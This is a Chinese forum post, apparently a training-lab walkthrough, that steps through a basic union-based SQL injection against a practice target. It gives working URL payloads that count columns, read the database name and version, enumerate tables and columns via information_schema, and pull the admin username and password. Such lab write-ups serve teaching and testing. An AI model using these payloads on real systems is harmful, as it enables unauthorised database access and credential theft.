公开课靶场 第一章 SQL注入

qop1114   ·   发表于 2020-07-29 18:16:00   ·   问题反馈

sql注入初级测试

0x01 发现目标

发现sql注入点

  1. http://59.63.200.79:8003/?id=1
  2. http://59.63.200.79:8003/?id=1%20and%201=1

%20 为url编码 空格

  1. http://59.63.200.79:8003/?id=1%20and%201=1%20order%20by%201
  2. http://59.63.200.79:8003/?id=1%20and%201=1%20order%20by%202
  3. //页面显示错误
  4. http://59.63.200.79:8003/?id=1%20and%201=1%20order%20by%203

判断回显字段

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,2

0x02 构造sql语句

1.查询当前数据库名

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,database()

2.查询数据库版本

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,version()

3.查询当前数据库 表名

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1

4.查询表列信息

limit 0,1, 从你的表中的第0个数据开始,只读取一个;

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27admin%27%20limit%200,1
  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27admin%27%20limit%201,1
  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27admin%27%20limit%202,1


查出 admin 表里 有 id username password 三个字段

5.构造语句查询用户

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,username%20from%20admin%20%20limit%200,1

发现仅有一个用户

查出用户密码

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,password%20from%20admin%20%20limit%200,1

打赏我,让我更有动力~

0 条回复   |  直到 2020-7-29 | 1829 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.